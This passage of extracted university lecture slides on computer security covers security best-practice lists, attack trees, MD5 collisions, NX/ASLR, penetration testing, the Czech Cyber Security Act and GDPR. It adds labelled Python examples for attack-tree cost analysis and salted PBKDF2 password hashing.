9. Maintain security patches

10. Educate your users

http://www.zdnet.com/10-security-best-practice-guidelines-for-businesses-7000012088/

21 Data Loss Prevention

Page 214

Secure your systems!

Figure: Source: http://i.iinfo.cz/images/263/maximum-securitz-entrance-1-prev.jpg

Page 215

Top ten for consumers, Ken Hess, 2013

1. Always use antivirus software on your personal devices

2. Always use a device firewall

3. Keep your operating systems and software up to date

4. Never download pirated or cracked software

5. Don't click on popup windows that tell you that your computer is infected with a virus

6. Be careful with email attachments

7. Don't use public wi-fi hotspots without using a VPN (secure) connection

8. Use passwords on everything and be sure that they're strong passwords

9. Beware of what kind of information you share on social media sites

10. Review your online accounts and credit report

http://www.zdnet.com/10-security-best-practice-guidelines-for-consumers-7000012171/

Page 216

Be informed!

Figure: Source: pinterest.com/itpie/it-jokes/

Page 217

Secure systems

Information leakage detection and protection

- Data Loss Prevention
- Information Leak Prevention
- Content Monitoring and Filtering
- Extrusion Prevention System

Page 218

Attack tree

Attack analysis

Figure: Attack tree
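The attack tree itself is only a figure on the slide. As an added example, not from the slides, here is the bottom-up evaluation that attack trees in Schneier's sense are used for: AND/OR nodes over leaf actions with a cost attribute, finding the cheapest path to the root goal, then raising the cost of one leaf to model a countermeasure and watching the cheapest path move. The tree, its goal and all costs are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class Node:
    """A node of an attack tree.

    kind: "LEAF" (an atomic attacker action with a cost),
          "OR"   (any one child achieves this goal),
          "AND"  (all children are needed).
    """
    name: str
    kind: str = "LEAF"
    cost: float = 0.0
    children: List["Node"] = field(default_factory=list)

def cheapest_attack(node: Node) -> Tuple[float, List[str]]:
    """Return (minimum total cost, leaf actions on that path) for this node's goal.

    OR nodes take the cheapest child, AND nodes sum all children: the standard
    bottom-up evaluation of a single numeric attribute over the tree.
    """
    if node.kind == "LEAF":
        return node.cost, [node.name]
    results = [cheapest_attack(c) for c in node.children]
    if node.kind == "OR":
        return min(results, key=lambda r: r[0])
    if node.kind == "AND":
        total = sum(r[0] for r in results)
        steps = [s for r in results for s in r[1]]
        return total, steps
    raise ValueError(f"unknown node kind {node.kind!r}")

def set_leaf_cost(node: Node, name: str, cost: float) -> bool:
    """Model a countermeasure by changing the cost of one leaf; True if it was found."""
    if node.kind == "LEAF":
        if node.name == name:
            node.cost = cost
            return True
        return False
    return any(set_leaf_cost(c, name, cost) for c in node.children)

def build_demo_tree() -> Node:
    """Constructed example: get at a clinic's patient records (all costs invented)."""
    return Node("Obtain patient records", "OR", children=[
        Node("Break into server room", "AND", children=[
            Node("Bypass door lock", cost=40),
            Node("Defeat CCTV", cost=35),
            Node("Copy disk", cost=5),
        ]),
        Node("Compromise clinician account", "OR", children=[
            Node("Phish clinician", cost=20),
            Node("Guess weak password", cost=15),
            Node("Bribe clinician", cost=200),
        ]),
        Node("Exploit web portal", "AND", children=[
            Node("Find injection flaw", cost=50),
            Node("Exfiltrate without detection", cost=30),
        ]),
    ])

if __name__ == "__main__":
    tree = build_demo_tree()
    print(cheapest_attack(tree))                 # weak password is the cheapest way in
    set_leaf_cost(tree, "Guess weak password", 500)   # password policy / lockout
    print(cheapest_attack(tree))                 # now phishing
    set_leaf_cost(tree, "Phish clinician", 500)       # training + phishing-resistant MFA
    print(cheapest_attack(tree))                 # physical and web paths tie
```

The same traversal works for any attribute that composes through AND and OR (probability, required skill, "needs special equipment"); only the two combining rules change.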

Page 219: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

Prehled technologiíZásadyPrevenceTesty

Hacked PC

Figure: Source: washington_post.com

Page 220

Kentucky Fraud

Figure: Kentucky Fraud

Page 221

Kentucky Fraud

Figure: Zeus, Checkpoint Security Report 2016

Page 222

Cryptography

- Symmetric ciphers: DES, AES, Blowfish, RC4, 3DES (DES and RC4 are obsolete and should not be used in new designs)
- Asymmetric ciphers: DH, RSA, ElGamal, EC
- Encryption key
  - Key strength and length must be considered
  - The possibility of the algorithm being broken must be considered (practical collision attacks exist for the MD5 and SHA-1 hash functions)

Page 224

MD5 collision

https://shells.aachen.ccc.de/~spq/md5.gif

Page 225

MD5 collision

How it works... The trick is to generate the image one digit at a time. You generate collision blocks after each frame so that you can swap out the digits once you know the hash, without altering the hash. This works because MD5 is a Merkle-Damgard construction: once two prefixes reach the same internal state, any identical suffix keeps them colliding, so the per-digit collision blocks can be chained and the finished image shows its own MD5 hash.

1. Generate a GIF frame for each possible hex digit in the first column
2. Append collision blocks to each frame to make a 16-way collision
3. Repeat for each digit
4. Hash the final product
5. Replace each digit with the correct one

Page 226

NX bit

- NX bit: a hardware feature; can also be emulated in software, at a cost in overhead
- Windows: since XP SP2 (DEP, Data Execution Prevention)
- Also ASLR, code signing
- NX on its own is mostly ineffective against ROP [22], which reuses code that is already executable; ASLR raises the bar because the attacker then also needs an address leak

22 Return Oriented Programming

Page 227

Penetration tests

- Attack simulation
- Mind the legal aspects (written authorization and an agreed scope before testing)
- Black box, white box, gray box testing
- Security audits
  - problem: the auditor may gain access to sensitive information
  - ethical question: may such a company employ a former hacker?

Page 229

ZKB (Czech Cyber Security Act)

- Act No. 181/2014 Coll., in force since 1 Jan 2015, with a transition period
- advantage: roughly follows ISO 27000 (ISO27k) [23]
- critical information infrastructure, significant information systems, significant electronic communication networks
- implementing decree in preparation: designates the significant information systems
- CERT/CSIRT (Computer Emergency Response Team / Computer Security Incident Response Team), NBÚ [24]

23 http://en.wikipedia.org/wiki/ISO/IEC_27000-series

24 More info: http://www.root.cz/clanky/cert-csirt-tymy-a-jejich-role/

Page 233

GDPR

- General Data Protection Regulation (EU 2016/679)
- (similar to the UK Data Protection Act 1998 (DPA))

The regulation was adopted on 27 April 2016. It enters into application on 25 May 2018 after a two-year transition period and, unlike a directive, it does not require any enabling legislation to be passed by national governments.

Page 234

GDPR

- Controller: determines how and why personal data is processed
- Processor: acts on the controller's behalf
- Personal data: anything that might (even indirectly) lead to identifying a person, e.g. cookies, IP addresses
- Applies to both automated and manually filed personal data
- Personal data that are pseudonymized (e.g. key-coded) can fall within the scope
- Accountability
- Breach notification: to the supervisory authority within 72 hours
- Data portability
- Data Protection Officer
- Citizens now have the right to question and fight decisions that affect them and that have been made on a purely algorithmic basis

Page 235

GDPR

Individual's rights

- The right to be informed
- The right of access
- The right to rectification
- The right to erasure
- The right to restrict processing
- The right to data portability
- The right to object

Page 236

Security

Is not a state of a system, it is a process: not only the defences evolve, the threats do too...

Figure: Access Control

Page 237

Always be prepared

Figure: Source: pinterest.com/itpie/it-jokes/

Page 238

Questions

Information for the course 33LI

- Password salting: must be implemented in the semester project.
- Exam info: topics from this lecture will appear in the exam test.
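For the password salting requirement, an added example that is not the course's reference solution: a random per-user salt, a deliberately slow key derivation (PBKDF2-HMAC-SHA256 from the Python standard library), a self-describing storage record and constant-time verification, next to the unsalted-hash anti-pattern it replaces. The record format, the iteration count and the sample passwords are choices made for this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor chosen for the example; it is a tunable and should grow with hardware speed.
ITERATIONS = 200_000
SALT_BYTES = 16

def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a record 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'.

    A fresh random salt per user means two users with the same password get
    different records, and a precomputed table of unsalted hashes is useless.
    Storing the parameters in the record lets them be raised later per user.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, record: str) -> bool:
    """Recompute the hash with the stored salt and parameters; compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(hash_hex)
        iterations = int(iters)
    except ValueError:            # malformed record
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(digest, expected)

def unsalted_md5(password: str) -> str:
    """The anti-pattern: identical passwords give identical, table-lookupable hashes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def demo() -> dict:
    """Two users pick the same weak password; compare what each storage scheme leaks."""
    pw = "Summer2017!"                      # constructed sample password
    weak_a, weak_b = unsalted_md5(pw), unsalted_md5(pw)
    rec_a, rec_b = hash_password(pw), hash_password(pw)
    return {
        "unsalted_equal": weak_a == weak_b,                     # True: reveals the shared password
        "salted_equal": rec_a == rec_b,                         # False: each record has its own salt
        "verify_ok": verify_password(pw, rec_a),                # True
        "verify_wrong": verify_password("summer2017!", rec_a),  # False
        "verify_garbage": verify_password(pw, "not-a-record"),  # False, no exception
    }
```

PBKDF2 is used because it needs no third-party package; where a library is available, Argon2 or scrypt are the stronger choices since they also cost memory, which slows GPU cracking more than iteration count alone.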

Thank you for your attention...

Page 239

Checkpoint security report 2013

"Our research shows that 75 % of hosts in organizations were not using the latest software versions (e.g. Acrobat Reader, Flash Player, Internet Explorer, Java Runtime Environment, etc). This means that these hosts were exposed to a wide range of vulnerabilities that could have been exploited by hackers. Our research also shows that 44 % of hosts in organizations were not running the latest Microsoft Windows Service Packs. Service packs usually include security updates for the operating system. Not running the latest versions increases security risk."

http://www.checkpoint.com/campaigns/security-report/

Pages 240-242: Checkpoint security report 2013 (title only; slide content not extracted)